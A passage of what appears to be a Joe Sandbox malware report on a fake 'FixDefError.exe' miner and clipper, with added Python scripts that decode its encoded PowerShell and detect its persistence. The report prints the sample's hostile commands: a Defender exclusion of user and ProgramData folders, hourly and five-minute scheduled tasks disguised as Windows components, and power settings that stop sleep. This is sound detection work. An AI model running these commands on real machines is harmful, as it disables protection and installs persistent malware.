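"""Decode and de-obfuscate the -EncodedCommand argument from this report.

Added triage example; it is not part of the Joe Sandbox report or of the sample.
ENCODED_COMMAND is copied verbatim from the ProgramStarter.exe -> cmd.exe entry.
The tampering heuristic (which cmdlets and switches count) is an assumption.
"""
import base64
import re

ENCODED_COMMAND = "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"

# PowerShell block comments, which this script uses as junk between real tokens.
COMMENT_BLOCK = re.compile(r"<#.*?#>", re.DOTALL)

# Assumption: these cmdlets, combined with -Exclusion* or -Disable* switches,
# change Defender configuration and are worth flagging when spawned via cmd.exe.
DEFENDER_CMDLETS = {"Add-MpPreference", "Set-MpPreference", "Remove-MpPreference"}


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over UTF-16LE text; padding may be missing on the wire."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def strip_comment_noise(script):
    """Drop <# ... #> comments and collapse whitespace; return (clean text, comments removed)."""
    cleaned, count = COMMENT_BLOCK.subn("", script)
    return " ".join(cleaned.split()), count


def analyze(b64):
    """Decode, de-obfuscate and summarise one -EncodedCommand value."""
    raw = decode_encoded_command(b64)
    cleaned, stripped = strip_comment_noise(raw)
    tokens = cleaned.split()
    cmdlet = tokens[0] if tokens else ""
    switches = [t for t in tokens if t.startswith("-")]
    paths = []
    if "-ExclusionPath" in tokens:
        # Environment-variable paths as written, or literal drive paths.
        paths = re.findall(r"\$env:\w+|[A-Za-z]:\\[^,)\s]+", cleaned)
    tampering = cmdlet in DEFENDER_CMDLETS and any(
        s.startswith(("-Exclusion", "-Disable")) for s in switches
    )
    return {
        "raw": raw,
        "cleaned": cleaned,
        "comment_blocks_stripped": stripped,
        "cmdlet": cmdlet,
        "switches": switches,
        "exclusion_paths": paths,
        "defender_tampering": tampering,
        "forced": "-Force" in switches,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(ENCODED_COMMAND), indent=2))
```

The comment stripping is what makes the check robust: matching on the decoded text before stripping would miss the cmdlet and its switch because they are never adjacent, while matching after stripping also catches the same trick with different junk strings.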
Source: C:\Users\user\Desktop\FixDefError.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FixDefError.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FixDefError.exe.log
Source: C:\Users\user\Desktop\FixDefError.exe | File created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
Source: WinRing0x64.sys.1.dr | Binary string: \Device\WinRing0_1_2_0
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
Source: C:\Users\user\Desktop\FixDefError.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: FixDefError.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\FixDefError.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Mutant created: \Sessions\1\BaseNamedObjects\eliciting
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_01
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Mutant created: \Sessions\1\BaseNamedObjects\disconsolate
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2728:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: FixDefError.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: FixDefError.exe | Static file information: File size 2393088 > 1048576
Source: FixDefError.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FixDefError.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x247800
Source: FixDefError.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: FixDefError.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ImpulseWatch.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ImpulseWatch.pdb|l source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ProgramInstaller.pdb source: FixDefError.exe
      Source: Binary string: Impulse.pdb source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
      Source: Binary string: ImpulseClipper.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr
Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_084E7050 pushfd ; retf
Source: C:\Users\user\Desktop\FixDefError.exe | Code function: 0_2_09DE4C09 push dword ptr [edx+ebp*2-75h]; iretd
Source: svhost.exe.1.dr | Static PE information: section name: .xdata
Source: FixDefError.exe | Static PE information: 0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.759171527144073

      Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File created: C:\ProgramData\RuntimeBrokerData\svhost.exe
Source: C:\Users\user\Desktop\FixDefError.exe | File created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe

      Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
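Read together, the schtasks and powercfg entries in the process-creation list and in this Boot Survival section describe one persistence pattern: thirteen differently named hourly tasks and two five-minute tasks all launch binaries under C:\ProgramData\RuntimeBrokerData, most with /RL HIGHEST, and the standby and hibernate timeouts are zeroed so the host never sleeps while the miner runs. The task names borrow from real Windows components (WmiPrvSE, RuntimeBroker, SecurityHealthSystray, OneDriveService), so detection should key on the action path, the run level, the re-launch interval and the fact that one binary is registered under many names rather than on the names themselves. The Python below is an added detection example, not part of the Joe Sandbox report; it runs that logic over a constructed sample made of command lines copied from the report plus two benign lines as controls. The USER_WRITABLE location list and the three-name SPRAY_THRESHOLD are assumptions of the example.

```python
"""Flag scheduled-task persistence and anti-sleep power changes in process command lines.

Added detection example; it is not part of the Joe Sandbox report. The command lines
below are copied from the report's process-creation entries, with two benign lines
constructed as controls. USER_WRITABLE and SPRAY_THRESHOLD are assumptions.
"""
import re

SAMPLE_COMMAND_LINES = [
    r'SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f',
    r'SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f',
    r'SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f',
    r'SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f',
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f',
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f',
    r'powercfg /x -standby-timeout-ac 0',
    r'powercfg /hibernate off',
    r'schtasks /create /sc daily /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"',  # constructed benign control
    r'powercfg /list',  # constructed benign control
]

# One schtasks switch and its optional value; values may be quoted and contain spaces.
SWITCH = re.compile(r'/([A-Za-z]+)(?:\s+(?!/)("[^"]*"|\S+))?')
# Assumption: locations any user can write to; a task action living there is suspect.
USER_WRITABLE = ("c:\\programdata\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")
SPRAY_THRESHOLD = 3  # assumption: this many differently named tasks for one binary
POWERCFG_ANTI_SLEEP = re.compile(
    r"-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b|/hibernate\s+off\b", re.I
)


def parse_schtasks(cmd):
    """Return {SWITCH: value} for a 'schtasks /create' command line, else None."""
    if not re.match(r"\s*schtasks(?:\.exe)?\s+/create\b", cmd, re.I):
        return None
    return {name.upper(): value.strip('"') for name, value in SWITCH.findall(cmd)}


def schtasks_findings(opts):
    """Findings for one parsed task: where it runs from, as whom, and how often."""
    findings = []
    target = opts.get("TR", "").lower()
    if any(marker in target for marker in USER_WRITABLE):
        findings.append("action_in_user_writable_path")
    if opts.get("RL", "").upper() == "HIGHEST":
        findings.append("runs_with_highest_privileges")
    if opts.get("SC", "").upper() == "MINUTE" and int(opts.get("MO") or 1) <= 5:
        findings.append("relaunch_every_5_minutes_or_less")
    return findings


def powercfg_findings(cmd):
    """Flag powercfg invocations that stop the machine from sleeping or hibernating."""
    if re.match(r"\s*powercfg(?:\.exe)?\b", cmd, re.I) and POWERCFG_ANTI_SLEEP.search(cmd):
        return ["disables_sleep_or_hibernate"]
    return []


def triage(lines):
    """Score each line and spot one binary registered under many task names."""
    per_line, names_by_target = [], {}
    for cmd in lines:
        opts = parse_schtasks(cmd)
        if opts is not None:
            findings = schtasks_findings(opts)
            names_by_target.setdefault(opts.get("TR", "").lower(), set()).add(opts.get("TN", ""))
        else:
            findings = powercfg_findings(cmd)
        per_line.append((cmd, findings))
    sprayed = {t: sorted(n) for t, n in names_by_target.items() if len(n) >= SPRAY_THRESHOLD}
    return {
        "per_line": per_line,
        "suspicious_lines": sum(1 for _, f in per_line if f),
        "sprayed_targets": sprayed,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_COMMAND_LINES)
    for cmd, findings in result["per_line"]:
        print(f"{'!' if findings else ' '} {cmd[:70]:70} {', '.join(findings)}")
    print("binaries registered under multiple task names:", result["sprayed_targets"])
```

The per-line findings are deliberately individually weak (an hourly task with /RL HIGHEST is common for legitimate updaters); the strong signal is the combination, and above all the spraying check, which only fires once several task names point at the same executable, as every RuntimeBroker.exe entry here does.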
Source: C:\Users\user\Desktop\FixDefError.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\FixDefError.exe TID: 5892 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5932 | Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 6068 | Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5948 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108 | Thread sleep count: 9137 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe TID: 3988 | Thread sleep time: -42200s >= -30000s
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Dropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Dropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Dropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\svhost.exe
      Source: C:\Users\user\Desktop\FixDefError.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9137
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Thread delayed: delay time: 30000
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Vmwaretrat
      Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
      Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V
      Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vboxtray
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vboxservice
      Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareM3X57C89Win32_VideoControllerL7AUS5NSVideoController120060621000000.000000-0007926944.display.infMSBDAV33ZTS67PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsEWREGOHN99
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Vmware
      Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Vmtoolsd
      Source: svchost.exe, 00000024.00000002.515586506.0000023C61E02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Vmwareuser
      Source: svchost.exe, 00000024.00000002.516433522.0000023C61E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.516467984.000001EA20466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.516600617.0000025B84229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\FixDefError.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File written: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#>
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "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
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f
      Source: C:\Users\user\Desktop\FixDefError.exe | Process created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "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
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
